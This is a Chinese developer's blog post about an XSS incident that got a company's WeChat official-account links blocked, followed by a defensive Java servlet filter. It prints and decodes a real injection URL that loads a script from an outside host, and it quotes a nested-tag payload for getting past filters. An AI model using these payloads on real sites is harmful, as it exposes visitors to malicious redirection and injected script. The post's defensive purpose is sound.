最近入职新公司后接手了一个项目,线上遇到一连串微信公众号的问题,都是项目之前留下的坑,之前没有接触过微信开发,踩完坑来记录一下。
XSS攻击
前景提要
公司项目属于比较旧的项目,没有前后端分离,还是用的SSM+JSP的架构,导致接口请求时被注入js脚本恶意跳转,然后被微信封了一批接口(例如https://www.aa.com/bb/cc接口被攻击,以bb为前缀的接口都会被封禁)
之前接触过的项目是前后端分离的,后台接口是REST风格,就算传入参数带有js脚本也造成不了影响(REST接口只向客户端返回数据),所以对XSS攻击没有太多了解,大概是接口做转发时把传入参数带到页面,然后页面对参数进行了一定的解析,遇到标签就执行了里面的代码,比如线上出现的这个恶意转发的问题,访问url被篡改成:
https://www.aa.com/bb/list.do?keyWord=1234abce';location.href%3Dja\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u005b\u0027\u0077\u0072\u0069\u0074\u0065\u0027\u005d\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0043\u0042\u007a\u0063\u006d\u004d\u0039\u004c\u0079\u0039\u0036\u004d\u0069\u0035\u006b\u0064\u0057\u0039\u0034\u0061\u0069\u0035\u006a\u0062\u0032\u0030\u0076\u0065\u0044\u0034\u0038\u004c\u0033\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0034\u00)3d%5Cu0027%5Cu0029%5Cu0029%5Cu003b%60//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`
一看这个url,里面有location.href,很明显就是被转发了,但后面那一串是什么?我们来解析一下
做个转义加编码转换,得到了下面的:
https://www.aa.com/bb/list.do?keyWord=1234abce';location.href=javascript:document['write'](atob('PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d'));`//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`
看到atob()函数,是BASE64的解密,对PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d
解密一下,得到:
<script src=//z2.duoxj.com/x></script>7t
这解析完是不是头大了,还有这种操作,之前看到知乎某个大佬总结XSS攻击的各种js脚本的写法,有一种更绝,预判你的预判,利用过滤后返回语句再次构成攻击语句来绕过,比如这种
http://192.168.1.102/xss/example3.php?name=<sCri<script>pt>alert("hey!")</scRi</script>pt>
,当你把<script>
过滤后留下的字符又组成了新的标签<sCript>
,真的是强
更多XSS攻击的姿势可见:https://zhuanlan.zhihu.com/p/26177815
问题解决
得,上面讲了一堆细节的,回到问题本身。线上用户访问被封禁的链接后会看到下面这个图
微信还贴心的提供了申请恢复访问
功能,这个申请一般是解决完系统漏洞后再去提交的,如果以前有解决经验可以先申请再修复,因为微信审核还是有点慢的(像我们领导联系了微信内部人员加紧审核,也用了4小时才审核通过)
然后我们来说下解决方法
像我们公司的项目页面用的jsp,可以在通用jsp页面中设置taglib,在标签类中做过滤的逻辑。
标签类一般继承TagSupport,然后重写doStartTag方法,在里面做过滤逻辑,标签类的定制化程度较高,这里就不贴代码了
另一种方法就是在servlet Filter中过滤,一般是重新包装chain.doFilter(ServletRequest var1, ServletResponse var2)中传入的HttpServletRequest,例子如下:
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
protected Log log = LogFactory.getLog(XssHttpServletRequestWrapper.class);
public XssHttpServletRequestWrapper(HttpServletRequest request) {
super(request);
}
@Override
public String getHeader(String name) {
String header = super.getHeader(name);
return StringEscapeUtils.escapeHtml4(header);
}
@Override
public String getQueryString() {
return htmlAndScriptEscape(super.getQueryString());
}
@Override
public String getParameter(String name) {
String parameter = super.getParameter(name);
return htmlAndScriptEscape(parameter);
}
@Override
public String[] getParameterValues(String name) {
String[] values = super.getParameterValues(name);
if (values != null && values.length > 0) {
int length = values.length;
String[] escapeValues = new String[length];
for (int i = 0; i < length; i++) {
escapeValues[i] = htmlAndScriptEscape(values[i]);
}
return escapeValues;
}
return super.getParameterValues(name);
}
@Override
public ServletInputStream getInputStream() throws IOException {
String string = this.getRequestBody(super.getInputStream());
try {
Map<String, Object> map = JSON.parseObject(string, Map.class);
Map<String, Object> resultMap = new HashMap<>();
for (String key : map.keySet()) {
Object val = map.get(key);
if (map.get(key) instanceof String) {
resultMap.put(key, htmlAndScriptEscape(val.toString()));
} else {
resultMap.put(key, val);
}
}
string = JSON.toJSONString(resultMap);
} catch (Exception e) {
}
final ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(string.getBytes());
return new ServletInputStream() {
@Override
public int read() throws IOException {
return byteArrayInputStream.read();
}
@Override
public boolean isFinished() {
return false;
}
@Override
public boolean isReady() {
return false;
}
@Override
public void setReadListener(ReadListener listener) {
}
};
}
/**
* @param stream
* @return
*/
private String getRequestBody(InputStream stream) {
String line = "";
StringBuilder body = new StringBuilder();
BufferedReader reader = new BufferedReader(new InputStreamReader(stream, Charset.forName("UTF-8")));
try {
while ((line = reader.readLine()) != null) {
body.append(line);
}
} catch (IOException e) {
e.printStackTrace();
}
return body.toString();
}
/**
* 过滤逻辑
* @param 过滤前的参数
* @return 过滤后的参数
*/
private String htmlAndScriptEscape(String input){
//处理逻辑
...
return input;
}
总结
其实回想起来这不过是个小问题,摸清楚问题的本质是很重要的,出现问题后首先应该知道这个错误为什么会发生,它的原理是什么,然后就能很快找到它出现问题的地方,剩下的就是找方法解决了。大部分人都踩过同样的坑,所以一般出现的问题都有解决方法。
不过在这次线上问题处理中,我犯了一个错误:
线上反馈问题后,我没有第一时间做紧急方案处理,导致线上这个链接相关的服务都没办法进行下去。正确的处理是将公众号菜单中链接的域名切换至备用的域名,这样链接就不会受限,用户访问也是正常的。然后才去解决漏洞的问题。
事情分紧急情况先后处理,这是一个很重要的习惯